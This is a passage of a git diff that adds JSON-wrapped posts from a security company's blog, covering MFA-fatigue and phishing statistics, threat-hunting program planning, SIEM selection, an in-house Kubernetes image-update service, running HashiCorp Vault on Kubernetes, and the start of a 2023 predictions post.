\u201cauthorizes\u201d or \u201caccepts\u201d the request. This allows the attacker to satisfy MFA. (Hackers may or may not have learned this technique from their four year-olds at home.) 6: Credential harvesters represented 88% of malicious email submissions. Credential theft via phishing continues to grow with identity the main focus of today\u2019s attacks. The top subject lines in malicious emails that resulted in an employee click or compromise were, \u201cIncoming Voice Message,\u201d \u201cChecking in,\u201d and \u201cVoice Mail Call received for .\u201d Our data shows that actionable, time-sensitive, and financially driven social engineering themes are most successful. The full report tells you more\u2014lots more\u2014 and provides insights and advice to help you defend against these threats. Give it a look and if you have questions drop us a line ." +} \ No newline at end of file diff --git a/3-must-dos-when-you-re-starting-a-threat-hunting-program.json b/3-must-dos-when-you-re-starting-a-threat-hunting-program.json new file mode 100644 index 0000000000000000000000000000000000000000..e0c5e5bc45c5492d31b58c4a66fe0012bbf150d6 --- /dev/null +++ b/3-must-dos-when-you-re-starting-a-threat-hunting-program.json @@ -0,0 +1,6 @@ +{ + "title": "3 must-dos when you're starting a threat hunting program", + "url": "https://expel.com/blog/3-must-dos-when-starting-threat-hunting-program/", + "date": "Aug 13, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG 3 must-dos when you\u2019re starting a threat hunting program Security operations \u00b7 4 MIN READ \u00b7 KATE DREYER \u00b7 AUG 13, 2019 \u00b7 TAGS: How to / Hunting / Planning / SOC / Threat hunting This is a recap of a talk two of our Expletives gave at Carbon Black\u2019s CB Connect in San Diego. Let us know what Qs you\u2019ve got about threat hunting \u2014 drop us a note or message us on Twitter to chat. So you\u2019ve decided you want to build a threat hunting program, but where do you start? There are several paths you can follow in building a threat hunting program. And, depending on what your hunting goals are, there are lots of options for how to hunt and what tools to use. However, figuring out exactly what approach is going to achieve your outcomes is often challenging too, especially when there are loads of fancy new tools being marketed at you every day and security buzzwords flying at you left and right. Our goal is to help you filter out the shiny stuff and think about the brass tacks of your program\u2014and what\u2019s going to make it (and you) successful. What Is Threat Hunting? Threat hunting is the process of creating a hypothesis, gathering past data, applying filtering criteria that supports the hypothesis, and investigating the leads that you generate. It\u2019s an important proactive way to look for attackers. If you\u2019ve got existing security tech, you can use that for threat hunting, or you can think about what tools you\u2019ll need to meet the goals of a new threat hunting program. And don\u2019t forget that using tools you already have and combining that data with other information\u2014like open-source intelligence\u2014is an option too. We recently put together a list of the pros and cons of using different security tech for threat hunting, which is a helpful read if you\u2019re wondering how to use the tech you already own to conduct a hunt, as well as finding new tech that can help you in generating hypotheses for successful threat hunting. Is Hunting Right For Your Org? There are plenty of reasons to start a threat hunting program. The biggest perk is that, when planned out and executed well, it\u2019ll provide you with an extra layer of security. However, like any investment it takes time and resources. And so you\u2019ll want to consider whether it\u2019s right for you and the business you\u2019re protecting. Before building your own threat hunting program, consider the risks facing your organization versus your available resources. For example, if you operate in a high-risk or highly-targeted environment\u2014maybe you work at a financial institution, a health facility or another company that stores large amounts of sensitive information about customers\u2014then hunting probably makes sense because there are plenty of adversaries who\u2019ll find your organization to be an attractive target. But if your organization\u2019s risk profile is medium- to low-risk, your time and budget might be better spent on less sophisticated threats like commodity malware. If you don\u2019t operate in a high-risk environment, hunting might distract you from things that should probably be higher on the priority list like implementing effective anti-phishing controls. 3 Tips As You Start Building Your Own Threat Hunting Program If you\u2019ve determined that you do want to build a threat hunting program, there are a couple considerations to mull over before knocking on your CISO\u2019s office door to ask for more people and budget. Think through your objectives, how you\u2019ll report on what you find and how you\u2019ll eventually scale your hunting program. Here are our three must-dos before you start a threat hunting program and how you can determine what information and technology to include within yours. Must-do 1: Know Your Threat Hunting Objectives Before you start talking about what tech you\u2019ll use for hunting or how many people you\u2019ll need, figure out what you\u2019re trying to accomplish and why. With threat hunting, you\u2019re assuming that something has already failed and you\u2019ve been compromised. So as you\u2019re defining your objectives, make sure to: Validate your existing controls: Your objective is to validate existing security controls. This means your hunting hypothesis should be focused on an attacker that\u2019s already bypassed one or more of your security controls to get into your network. Where are there known (or suspected) vulnerabilities, or what controls have failed in the past? Assess the quality of your alert management and triage capabilities: Threat hunting is a great way to perform Quality Assurance (QA) on your alert management and triage efforts. You probably want to have someone reviewing the hunt results who didn\u2019t spend a ton of time in the past month reviewing alerts. You\u2019ll want to run techniques where the hypothesis is looking for activity where you would\u2019ve expected alerts to be generated. A good example here could be looking for suspicious powershell usage. Identify notable events in your environment: If you\u2019re hunting, the goal doesn\u2019t always have to be to identify threats. Notable events are events that your hunting techniques identified that were previously unknown. You might uncover policy violations like discovering unauthorized software, or you may find activities that software or employees performed that you (or your team or customer) didn\u2019t know about. Evolve your detection libraries: If you have hunting techniques in place, a long-term goal is to figure out ways to make them high enough fidelity without losing their value so that they can become detections. Similarly, if you have detections that are too prone to false positives, think about how you can build a hypothesis around them and turn them into hunting techniques. Must-do 2: Decide How and What Information to Report On After defining your objectives, think about how you\u2019ll report on the findings from your hunts. Not only that, but also consider who you\u2019re going to brief on those insights. For example, what hunt technique are you using and why? What data did you review and what did you discover? Then talk about the outcome of your hunt, including what steps you should take\u2014if any\u2014to make your org more resilient in the future. Must-do 3: Consider Long-Term Scaling of the Program Conducting a first successful hunt is great, but how do you plan to make threat hunting part of your ongoing security practices going forward? Can you maintain an effective threat hunting program with the resources you have today or do you need new tech or more people? Think about what scale looks like based on your goals and the business\u2019s needs. Be prepared to have a conversation about all of your ideas on future scaling of your threat hunting program with your CISO or team lead. Have More Questions About Threat Hunting? To learn how Expel can help with your threat hunting program, contact us ." +} \ No newline at end of file diff --git a/3-steps-to-figuring-out-where-a-siem-belongs-in-your.json b/3-steps-to-figuring-out-where-a-siem-belongs-in-your.json new file mode 100644 index 0000000000000000000000000000000000000000..cd491309c60e9c947e02565d6f9d66e3f2e9171c --- /dev/null +++ b/3-steps-to-figuring-out-where-a-siem-belongs-in-your.json @@ -0,0 +1,6 @@ +{ + "title": "3 steps to figuring out where a SIEM belongs in your ...", + "url": "https://expel.com/blog/3-steps-to-figuring-out-where-siem-belongs-in-security-program/", + "date": "Sep 22, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG 3 steps to figuring out where a SIEM belongs in your security program Tips \u00b7 9 MIN READ \u00b7 MATT PETERS, DAN WHALEN AND PETER SILBERMAN \u00b7 SEP 22, 2020 \u00b7 TAGS: MDR / SIEM / Tech tools Spin up a conversation about someone\u2019s security operations and chances are the conversation will quickly move to their security information and event management (SIEM) tool. A SIEM can play an important role in your security strategy. But figuring out where it belongs (and what type of SIEM is best for you) depends on a few things. So, where to begin? We\u2019ve pinpointed three steps that can help you figure out where a SIEM fits within your security program. This post walks you through each of these steps and we hope it will help you decide what makes the most sense for you, your team and your business. Step 1: Figure out where you are on your SIEM journey Working with different customers, we\u2019ve seen most orgs fall into one of three different categories. Which one are you? Just getting started Maybe you\u2019re just starting to get serious about security or you reached an inflection point and are looking for a SIEM to take your security program to the next level. You\u2019re optimistic about the prospects of a SIEM and how it can help address some of your pain points, whether that\u2019s addressing visibility gaps or keeping your auditors happy! As you explore all of the SIEM options out there, you\u2019re pretty quickly realizing there are a ton of opportunities (especially around automation) but it\u2019s also hard to get a handle on what factors should influence your decision. You may also be wondering: if it\u2019s so easy to automate why isn\u2019t everyone doing this successfully? You\u2019re excited to bring in a SIEM and up level your team but you\u2019re also wondering what pitfalls you should avoid and how to steer clear of a path that will end up costing too much and bogging down your team with low value work. Doubling down You\u2019ve had a SIEM or two (or three) and know what it takes to keep it singing. You\u2019ve learned through trial and error what works, what doesn\u2019t and the level of investment (people and money) you need internally (or through third-party partners ) to accomplish your use cases. You\u2019ve also had time to really figure out what use cases matter to you. All of those flashy selling points you thought would be a great value add? You\u2019ve come to terms with the fact that many of them aren\u2019t for you. You know what you want of your SIEM and are looking to get the most you can with your existing investment \u2013 this could mean dedicating internal resources to managing your SIEM or looking outward for help. Disillusioned skeptic You aren\u2019t sold on the tale that a SIEM can solve all of your security woes and you aren\u2019t afraid to talk about it. How did you get here? It may have had something to do with your past experiences \u2013 you\u2019ve tried to make a SIEM work in the past and have gotten burned . Maybe the product (or products) didn\u2019t do what you wanted, or it ended up costing way more than you could justify. Regardless, you now view your security program more holistically and don\u2019t see a SIEM as the single source of truth. Sure, there are use cases where it makes sense (you may still have a SIEM kicking around in a corner for your application and OS logs) but you\u2019re reluctant to hinge the success of your security program on a single solution. You prefer to rely on your various security products and services to get you the visibility and response capabilities you need to be successful. Now that you\u2019ve figured out where you are in the SIEM journey, it\u2019s time to move on to the next step! Step 2: Determine what use cases are most important to you No matter where you are in your journey, it\u2019s important to clarify (and often re-clarify) what you \u2018re expecting your SIEM to do. You can make a SIEM do just about anything with enough effort (and consultants and money) and that\u2019s exactly what many organizations have done. Don\u2019t know where to begin? Consider the following use cases and who (you or a third-party) you envision taking responsibility: Use Case Description Examples Compliance and reporting Do you have regulatory requirements for retaining certain types of data? A SIEM could help you aggregate all of this required data and make it easy to satisfy audit requirements. ISO 27001 certification Threat Detection Depending on the maturity of your security program, you may have the need/desire to write your own detection rules. A SIEM can provide these capabilities, but also requires a definite investment in content management. Consider if you want to invest in internal teams to write and maintain detection rules or whether you want to leverage security products or services to accomplish this use case. You want to invest in a team to build custom detections for your unique application data You want alerts, but don\u2019t want to be responsible for content. (This is when you may want to look to products or services like Expel !) Investigative support A SIEM can be a powerful investigative tool if it\u2019s fed with the right data and given the love and attention it needs. Using a SIEM for investigation is a very common use case, whether you\u2019re investing in an internal team or partnering with a third party to respond to your alerts. For this use case, consider how easy it is to add new log sources and how intuitive/fast searching that data is. An easy and fast search capability will empower your analysts to get to the bottom of an alert without unnecessary frustration. Building an internal security team that investigates with your SIEM Partnering with a third party like Expel to investigate with your SIEM Response Automation Containing and remediating an incident can be challenging, especially in large enterprise environments. If this is a challenge for your organization, consider how you can apply technology to this problem. Some SIEM technologies have built in response capabilities or SOAR integrations that can help in this area. As you explore these options, pay close attention to the level of effort required to configure these tools and make sure your investment will actually help solve your problem. Also consider who you want to be responsible for managing the tool (you vs third party). Splunk with Phantom integration A SOAR tool like Demisto Case Management Who did what and when? As your security program matures, process becomes more important. Once you have multiple analysts responsible for responding to alerts, knowing \u201cwho\u2019s got it\u201d and how issues were resolved helps you understand what\u2019s happening across the environment. You can communicate that upwards to drive change. As you think about this use case, you\u2019ll need to decide where you want incident management to occur \u2013 is it in your SIEM, a ticketing system or is a partner/third-party service responsible for managing alerts? Splunk with Enterprise Security serving as an incident management tool A ticketing system like Jira or Service Now Step 3: Know what type of SIEM you have (or want) Finally, whether you have a SIEM or are going shopping for one, it\u2019s important to first understand use cases. Once you identify your needs, you can figure out which SIEMs are best for you. Traditional SIEM Traditional SIEMs are typically large, multifunction applications. They tend to have highly structured data models (think SQL vs full text indexing) which enable certain types of use cases but make others more difficult. If given proper care, they can be very powerful but often aren\u2019t very flexible to changing requirements over time. Sample Vendors: QRadar, Arcsight, LogRhythm What are they good at? Highly oppinated data models make querying data and writing detections easy (once you understand the data model) One \u201cright\u201d way to do things keeps things relatively simple (accessibility is often better) Often come with a lot of out of the box features for detection, compliance and reporting Strong incident management feature sets, are a good candidate for \u201csingle source of truth\u201d Products have been around for a long time and are generally mature and stable What are some common pain points? Hampered solutions (limited by opinionated data models/vendor\u2019s way of doing things) For on-prem installations, management can be a significant investment, so you need to plan for that Slower to accommodate new use cases/features and can become \u201cbehind the times\u201d Search-based SIEM Search-based SIEMs are essentially a log aggregation and search tool first with other features added on top of that core function. They have flexible data models and everything is driven by a search from rules to reporting and dashboards. But they often require a lot of expertise to satisfy certain use cases (like detection) \u2013 meaning you\u2019ve got to live and breathe their search language to see value. Sample Vendors: Splunk ES, Sumo Logic, Exabeam What are they good at? Strong investigative support due to powerful search capabilities Flexible and accommodating for new use cases Often easier to manage (particularly for cloud-based/SaaS products) What are some common pain points? Incident management feature sets often lag behind traditional SIEMs as they have a less structured data model Requires expertise to accomplish your use cases (you need to be an expert in their search language) DIY SIEM TL;DR \u2013 you\u2019re starting from scratch. DIY SIEM options are usually open source projects organizations invest in and build additional tooling around. These options offer a lot of flexibility and can be much more cost effective, however they require a significant investment in engineering and in-house security expertise to build out security use cases. Sample Vendors: Elastic stack, OSSIM What are they good at? Potential long-term cost savings (if you have significant in-house expertise to build and manage!) Flexibility: You have complete control over the solution and can build out the use cases you need What are some common pain points? Organizations often realize they\u2019ve \u201cbitten off more than they can chew\u201d in terms of engineering and security expertise required to build and manage a DIY SIEM On-going operational cost of maintenance is on your internal team instead of a third party, which potentially distracts you from the things that are important to your business Open source options are often significantly limited in feature sets and deployment size May not be compatible with security services (if you ever choose to partner) No SIEM Some organizations forgo a SIEM altogether. This may be an option in cases where your use cases can be satisfied with other existing tools or partnerships with third party services. For example, if you have no regulatory requirements and have limited log sources (perhaps a few SaaS applications) there may be no good reason to invest heavily in a SIEM if a third party like Expel can address your use cases directly! Sample Vendors: Expel and other similar MSSP/MDRs/XDRs What are the advantages of forgoing SIEM? One less security tool you have to pay for Reduced complexity and less responsibility What are some reasons you might need a SIEM? Regulatory requirements You have use cases your existing products and services can\u2019t accomplish (like writing rules against your custom application logs or helping your internal teams investigate issues) What\u2019s your next step? There\u2019s a lot to consider as you think (or re-think) how a SIEM should fit into your security program. By identifying where you\u2019re in your SIEM journey (and where you want to go), prioritizing use cases and choosing the right SIEM product, you can set your team up for long term success. There\u2019s likely no \u201cone-size-fits-all\u201d solution, but here are some common models we\u2019ve seen: SIEM model cheat sheet ( steal me! ) Decentralized model Some organizations do not have a significant need or desire to invest in a SIEM. These organizations may still have a SIEM off in a corner somewhere for a very specific purpose, but it is not central to their security program. Instead, security signal is often consumed directly from security products or from a third-party monitoring service like Expel. Hybrid model A SIEM can help layer additional capabilities on top of existing security controls. A hybrid approach (where a SIEM is used in combination with other security tools) can help deliver capabilities that are \u201cbest of both worlds.\u201dAs an example, many organizations choose to use their SIEM for investigation and compliance, but rely on their security products for detections and a ticketing system for incident management. A service like Expel in this model can help by integrating with all of the various sources of signal directly while leveraging the capabilities of the SIEM to provide visibility across the environment. Centralized model (single pane of glass) In this model, the SIEM is the center of the organization\u2019s security program. The organization is investing significantly in their SIEM and wants it to be the place where everything happens \u2013 from alerting to response and incident management. This model requires expertise, either internal or third party (like a co-managed SIEM service) to succeed. It also requires that all security signals be routed through the SIEM for detection and response. This is an expensive but effective approach for large security teams that have the resources to go this route. Organizations considering this approach should consider their use cases carefully and ensure the long-term investment is worth it! In many cases, the same use cases can be accomplished with a hybrid approach at a lower cost. Parting thoughts We\u2019ve seen all of these models work. Your decision depends on what makes sense for your business. The key to success is understanding what is important to you and what options you have in front of you. We\u2019ve gone through this very process at Expel and hope this framework can work for you too! Want to talk to someone before making a decision about your information security? Let\u2019s chat ." +} \ No newline at end of file diff --git a/45-minutes-to-one-minute-how-we-shrunk-image-deployment.json b/45-minutes-to-one-minute-how-we-shrunk-image-deployment.json new file mode 100644 index 0000000000000000000000000000000000000000..42d47d75d6c83e549b0cb77109b2959bdeee9338 --- /dev/null +++ b/45-minutes-to-one-minute-how-we-shrunk-image-deployment.json @@ -0,0 +1,6 @@ +{ + "title": "45 minutes to one minute: how we shrunk image deployment ...", + "url": "https://expel.com/blog/how-we-shrunk-image-deployment-time/", + "date": "Dec 13, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG 45 minutes to one minute: how we shrunk image deployment time Engineering \u00b7 5 MIN READ \u00b7 BJORN STANGE \u00b7 DEC 13, 2022 \u00b7 TAGS: Tech tools We use a GitOps workflow. In practice, this means that all of our infrastructure is defined in YAML (either plain or templated YAML using jsonnet) and continuously applied to our Kubernetes (k8s) cluster using Flux. Initially, we set up Flux v1 for image auto updates. This meant that in addition to applying all the k8s manifests from our Git repo to the cluster, Flux also watched our container registry for new tags on certain images and updated the YAML directly in that repo. This seems great on paper, but in practice it ended up not scaling very well. One of my first projects when I joined Expel was to improve the team\u2019s visibility into the health of Flux. It was one of the main reasons that other teams came to the #ask-core-platform Slack channel for help. Here are a few such messages: Is Flux having issues right now? I made an env var change to both staging and prod an hour ago and I\u2019m not seeing it appear in the pods, even after restarting them Could someone help me debug why my auto deploys have stopped? Hi team, Flux isn\u2019t deploying the latest image in staging Hi! Is Flux stuck again? Waiting 30m+ on a deploy to staging Deployment smoketest We decided to build a deployment smoketest after realizing that Flux wasn\u2019t providing enough information about its failure states. This allowed us to measure the time between when an image was built and when it went live in the cluster. We were shocked to find that it took Flux anywhere between 20 to 45 minutes to find new tags that had been pushed to our registry and update the corresponding YAML file. (To be clear, Flux v1 is no longer maintained and has been replaced with Flux v2.) These scalability issues were even documented by the Flux v1 team. (Those docs have since been taken down, otherwise I would link them.) I believe it was because we had so many tags in Google Container Registry (GCR), but the lack of visibility into the inner workings of the Flux image update process meant that we couldn\u2019t reach any definitive conclusions. We were growing rapidly, teams were shipping code aggressively, and more and more tags were added to GCR every day. We\u2019re at a modest size (~350 images and ~40,000 tags). I did some pruning of tags older than one year to help mitigate the issue, but that was only a temporary fix to hold us over until we had a better long-term solution. The other failure state we noticed is that sometimes invalid manifests found their way into our repo. This would result in Flux not being able to apply changes to the cluster, even after the image had been updated in the YAML. This scenario was usually pretty easy to diagnose and fix since the logs made it clear what was failing to apply. Flux also exposes prometheus metrics that expose how many manifests were successfully and unsuccessfully applied to the cluster, so creating an alert for this is straightforward. Neither the Flux logs nor the metrics had anything to say about the long registry scan times, though. Image updater We decided to address the slow image auto-update behavior by writing our own internal service. Initially, I thought we should just include some bash scripts in CircleCI to perform the update (we got a proof-of-concept working in a day) but decided against it as a team since it wouldn\u2019t provide the metrics/observability we wanted. We evaluated ArgoCD and Flux v2, but decided that it would be better to just write something in-house that did exactly what we wanted. We had hacked together a solution to get Flux v1 to work with our jsonnet manifests and workflow, but it wasn\u2019t so easy to do with the image-update systems that came with ArgoCD and Flux v2. Also, we wanted more visibility/metrics around the image update process. Design and architecture This relatively simple service does text search + replace in our YAML/jsonnet files, then pushes a commit to the main branch. We decided to accomplish this using a \u201ckeyword comment\u201d so we\u2019d be able to find the files, and the lines within those files, to update. Here\u2019s what that looks like in practice for yaml and jsonnet files. image: gcr.io/demo-gcr/demo-app:0.0.1 # expel-image-automation-prod local staging_image = \u2018gcr.io/demo-gcr/demo-app:staging-98470dcc\u2019; // expel-image-automation-staging local prod_image = \u2018gcr.io/demo-gcr/demo-app:0.0.1\u2019; // expel-image-automation-prod We also decided to use an \u201cevent-based\u201d system, instead of one that continuously polls GCR. The new system would have to be sent a request by CircleCI to trigger an \u201cimage update.\u201d The new application would have two components, each with its own responsibilities. We decided to write this in Go, since everyone on the team was comfortable maintaining an internal Go service (we already maintain a few). Server The server would be responsible for receiving requests over HTTP and updating a database with the \u201cdesired\u201d tag of an image, and which repo and branch we\u2019re working with. The requests and responses are JSON, for simplicity. We use Kong to provide authentication to the API. Syncer The syncer is responsible for implementing most of the \u201clogic\u201d of an image update. It first finds all \u201cout of sync\u201d images in the database, then it clones all repos/branches it needs to work with, then does all the text search/replace using regex, and then pushes a commit with the changes to GitHub. We decided to use ripgrep to find all the files because it would be much faster than anything we would implement ourselves. We try to batch all image updates into a single commit, if possible. The less often we have to perform a git pull, git commit, and git push, the faster we\u2019ll be. The syncer will find all out of date images and update them in a single commit. If this fails for some reason, then we fall back to trying to update one image at a time and creating a commit + pushing + pulling for each image. This is how image-updater fits into our GitOps workflow today. Improvements Performance Performance is obviously the main benefit here. The image update operation takes, on average, two to four seconds. From clicking release on GitHub to traffic being served by the new replica set usually takes around seven minutes (including running tests/building the docker image, and waiting for the two- minute Flux cluster sync loop). The image-update portion of that takes only one sync loop, which runs every minute. Hence, 45 minutes to one \ud83d\ude42. We\u2019re still migrating folks off of Flux and onto image-updater, but as far as we can tell, things are humming away smoothly and the developers can happily ship their code to staging and production without having to worry about whether Flux will find their new image. Observability The nice thing about writing your own software is that you can implement logging and metrics exactly how you\u2019d like. We now have more visibility into our image update pipeline than ever. We implemented tracing to give us more granular visibility into how long it takes our sync jobs to run. This allows us to identify bottlenecks in the future if we ever need to, as we can see exactly how long each operation takes (git pull, git commit, find files to update, perform the update, git push, etc). As expected, the git pull and push operations are the most expensive. We also have more visibility into which images are getting pushed through our system. We implemented structured logging that follows the same pattern as the rest of the Go applications at Expel. We now know exactly if/when images fail to get updated and why, via metrics and logs. jsonnet This system natively supports jsonnet, our preferred method of templating our k8s YAML. Flux v1 did not natively support jsonnet. We even made a few performance improvements to the process that renders our YAML along the way. Plans for the future Flux v1 is EOL so we\u2019re planning on moving to ArgoCD to perform the cluster sync operation from GitHub. We prototyped ArgoCD already and really like it. We\u2019ve got a bunch of ideas for the next version of image updater, including a CLI, opening a pull request with the change instead of just committing directly to main, and integrating with Argo Rollouts to automatically roll back a release if smoketests fail." +} \ No newline at end of file diff --git a/5-best-practices-to-get-to-production-readiness-with.json b/5-best-practices-to-get-to-production-readiness-with.json new file mode 100644 index 0000000000000000000000000000000000000000..a6d17320670d47b4adbb508274efecacf2a8fb78 --- /dev/null +++ b/5-best-practices-to-get-to-production-readiness-with.json @@ -0,0 +1,6 @@ +{ + "title": "5 best practices to get to production readiness with ...", + "url": "https://expel.com/blog/production-readiness-hashicorp-vault-kubernetes/", + "date": "Mar 9, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG 5 best practices to get to production readiness with Hashicorp Vault in Kubernetes Engineering \u00b7 6 MIN READ \u00b7 DAVID MONTOYA \u00b7 MAR 9, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools At Expel, we\u2019ve been long-time users of Hashicorp Vault. As our business and engineering organization has grown, so has our core engineering platform\u2019s reliance on Hashicorp Vault to secure sensitive data and the need to have a highly-available Vault that guarantees the continuity of our 24\u00d77 managed detection and response (MDR) service. We also found that as our feature teams advanced on their Kubernetes adoption journey, we needed to introduce more Kubernetes idiomatic secret-management workflows that would enable teams to self-service their secret needs for containerized apps. Which meant that we needed to increase our Vault infrastructure\u2019s resilience and deployment efficiency, and unlock opportunities for new secret-access and encryption workflows. So, we set out to migrate our statically-provisioned VM-based Vault to Google Kubernetes Engine (GKE). We knew the key to success is following best security practices in order to incorporate Hashicorp Vault into our trusted compute base. There are a variety of documented practices online for running Vault in Kubernetes. But some of them aren\u2019t up-to-date with Kubernetes specific features added on newer versions of Vault, or fail to describe the path to take Vault securely to production-readiness. Let\u2019s connect That\u2019s why I created a list of architectural and technical recommendations for Expel\u2019s site reliability engineering (SRE) team. And I\u2019d like to share these recommendations with you. (Hi, I\u2019m David and I\u2019m a senior SRE here at Expel.) After reading this post, you\u2019ll be armed with some best practices that\u2019ll help you to reliably and securely deploy, run and configure a Vault server in Kubernetes. What is Hashicorp Vault? Before we dive into best practices, let\u2019s cover the basics. Hashicorp Vault is a security tool rich in features to enable security-centric workflows for applications. It allows for secret management for both humans and applications, authentication federation with third-party APIs (e.g.: Kubernetes), generation of dynamic credentials to access infrastructure (e.g.: a PostgreSQL database), secure introduction (for zero trust infrastructure) and encryption-as-a-service. All of these are guided by the security tenet that all access to privileged resources should be short-lived. As you read this post, it\u2019s also important to keep in mind that a Kubernetes cluster is a highly dynamic environment. Application pods are often shuffled around based on system load, workload priority and resource availability. This elasticity should be taken into account when deploying Vault to Kubernetes in order to maximize the availability of the Vault service and reduce the chances of disruption during Kubernetes rebalancing operations. Now on to the best practices. Initialize and bootstrap a Vault server To get a Vault server operational and ready for configuration, it must first be initialized, unsealed and bootstrapped with enough access policies for admins to start managing the vault. When initializing a Vault server, two critical secrets are produced: the \u201cunseal keys\u201d and the \u201croot token.\u201d These two secrets must be securely kept somewhere else \u2013 by the person or process that performs the vault initialization. A recommended pattern for performing this initialization process and any subsequent configuration steps is to use an application sidecar. Using a sidecar to initialize the vault, we secured the unseal keys and root token in the Google Secret Manager as soon as they were produced, without requiring human interaction. This prevents the secrets from being printed to standard output. The bootstrapping sidecar application can be as simple as a Bash script or a more elaborate program depending on the degree of automation desired. In our case, we wanted the bootstrapping sidecar to not only initialize the vault, but to also configure access policies for the provisioner and admin personas, as well as issue a token with the \u201cprovisioner\u201d policy and secure it in the Google Secret Manager. Later, we used this \u201cprovisioner\u201d token in our CI workflow in order to manage Vault\u2019s authentication and secret backends using Terraform and Atlantis . We chose Go for implementing our sidecar because it has idiomatic libraries to interface with Google Cloud Platform (GCP) APIs and reusing the Vault client library already included in Vault is easy \u2013 which is also written in Go. Pro tip: Vault policies govern the level of access for authenticated clients. A common scenario, documented in Vault\u2019s policy guide , is to model the initial set of policies after an admin persona and a provisioner persona. The admin persona represents the team that operates the vault for other teams or an org, and the provisioner persona represents an automated process that configures the vault for tenants access. Considering the workload rebalancing that often happens in a Kubernetes cluster, we can expect the sidecar and vault server containers to suddenly restart. Which is why it\u2019s important to ensure the sidecar can be gracefully stopped and can accurately determine the health of the server before proceeding with any configuration and further producing log entries for the admins with an initial diagnosis on the status of the vault. By automating this process, we also made it easier to consistently deploy vaults in multiple environments, or to easily create a new vault and migrate snapshotted data in a disaster recovery scenario. Run Vault in isolation We deploy Vault in a cluster dedicated for services offered by our core engineering platform, and fully isolated from all tenant workloads. Why? We use separation of concerns as a guiding principle in order to guarantee the principle of least privilege when granting access to infrastructure. We recommend running the Vault pods on a dedicated nodepool to have finer control over their upgrade cycle and enabling additional security controls on the nodes. When implementing high availability for applications, as a common practice in Kubernetes, pod anti-affinity rules should be used to ensure no more than one Vault pod is allocated to the same node. This will isolate each vault server from zonal failures and node rebalancing activities. Implement end-to-end encryption This is an obvious de-facto recommendation when using Vault . Even for non-production vaults you should use end-to-end TLS. When exposing a vault server through a load balanced address using a Kubernetes Ingress, make sure the underlying Ingress controller supports TLS passthrough traffic to terminate TLS encryption at the pods, and not anywhere in between. Enabling TLS passthrough is the equivalent of performing transmission control protocol (TCP) load balancing to the Vault pods. Also, enable forced redirection from HTTP to HTTPS. When using kubernetes/ingress-nginx as the Ingress controller, you can configure TLS passthrough with the Ingress annotation nginx.ingress.kubernetes.io/ssl-passthrough. Configuration for the Ingress resource should look as follows: Ensure traffic is routed to the active server In its simplest deployment architecture, Vault runs with an active server and a couple hot-standbys that are often checking the storage backend for changes on the writing lock. A common challenge when dealing with active-standby deployments in Kubernetes is ensuring that traffic is only routed to the active pod. A couple common approaches are to either use readiness probes to determine the active pod or to use an Ingress controller that supports upstream health checking. Both approaches come with their own trade-offs. Luckily, after Vault 1.4.0 , we can use the service_registration stanza to allow Vault to \u201cregister\u201d within Kubernetes and update the pods labels with the active status. This ensures traffic to the vault\u2019s Kubernetes service is only routed to the active pod. Make sure you create a Kubernetes RoleBinding for the Vault service account that binds to a Role with permissions to get , update and patch pods in the vault namespace. The vault\u2019s namespace and pod name must be specified using the Downward API as seen below. Enable service registration in the vault .hcl configuration file like this: Set VAULT_K8S_POD_NAME and VAULT_K8S_NAMESPACE with the current namespace and pod name: With the configuration above, the Kubernetes service should look like this: Configure and manage Vault for tenants with Terraform Deploying, initializing, bootstrapping and routing traffic to the active server are only the first steps toward operationalizing a vault in production. Once a Hashicorp Vault server is ready to accept traffic and there is a token with \u201cprovisioner\u201d permissions, you\u2019re ready to start configuring the vault authentication methods and secrets engines for tenant applications. Depending on the environment needs, this type of configuration can be done using the Terraform provider for Vault or using a Kubernetes Operator. Using an operator allows you to use YAML manifests to configure Vault and keep their state in sync thanks to the operator\u2019s reconciliation loop. Using an operator, however, comes at the cost of complexity. This can be hard to justify when the intention is to only use the operator to handle configuration management . That\u2019s why we opted for using the Terraform provider to manage our vault configuration. Using Terraform also gives us a place to centralize and manage other supporting configurations for the authentication methods. A couple examples of this is configuring the Kubernetes service account required to enable authentication delegation to a cluster\u2019s API server or enabling authentication for the vault admins using their GCP service account credentials. When using the Kubernetes authentication backend for applications running in a Kubernetes cluster, each application can authenticate to Vault by providing a Kubernetes service account token (a JWT token) that the Vault server uses to validate the caller identity. It does this by invoking the Kubernetes TokenReview API on the target API server configured via the Terraform resource vault_kubernetes_auth_backend_config . Allow Vault to delegate authentication to the tenants\u2019 Kubernetes cluster: Once you\u2019ve configured Vault to allow for Kubernetes authentication, you\u2019re ready to start injecting vault agents onto tenant application pods so they can access the vault using short-lived tokens. But this is a subject for a future post. Are you cloud native? At Expel, we\u2019re on a journey to adopt zero trust workflows across all layers of our cloud infrastructure. With Hashicorp Vault, we\u2019re able to introduce these workflows when accessing application secrets or allowing dynamic access to infrastructure resources. We also love to protect cloud native infrastructure. But getting a handle of your infrastructure\u2019s security observability is easier said than done. That\u2019s why we look to our bots and tech to improve productivity. We\u2019ve created a platform that helps you triage Amazon Web Services (AWS) alerts with automation. So, in addition to these best practices, I want to share an opportunity to explore this product for yourself and see how it works. It\u2019s called Workbench\u2122 for Engineers, and you can get a free two-week trial here. Check it out and let us know what you think!" +} \ No newline at end of file diff --git a/5-cybersecurity-predictions-for-2023.json b/5-cybersecurity-predictions-for-2023.json new file mode 100644 index 0000000000000000000000000000000000000000..6e2e21aaed0c63638a822228ee4d38e0c47fcb52 --- /dev/null +++ b/5-cybersecurity-predictions-for-2023.json @@ -0,0 +1,6 @@ +{ + "title": "5 cybersecurity predictions for 2023", + "url": "https://expel.com/blog/5-cybersecurity-predictions-for-2023/", + "date": "Dec 21, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG 5 cybersecurity predictions for 2023 Expel insider \u00b7 3 MIN READ \u00b7 DAVE MERKEL, GREG NOTCH, MATT PETERS AND CHRIS WAYNFORTH \u00b7 DEC 21, 2022 \u00b7 TAGS: Cloud security / MDR It\u2019s that magical time of year when security folks dust off their crystal balls and do their best to gaze into the future\u2014hazarding a (well-informed) guess at what\u2019s on the horizon for cybersecurity in 2023. A few leaders on the Expel team took some time to reflect on learnings from this year\u2014from our own customers and the broader security community\u2014to share what they think is next for the industry in the new year. Here are their thoughts. 1. The cyber-insurance industry is ripe for disruption. Cyber insurance is an expensive, complex, and difficult necessity in the cybersecurity industry. 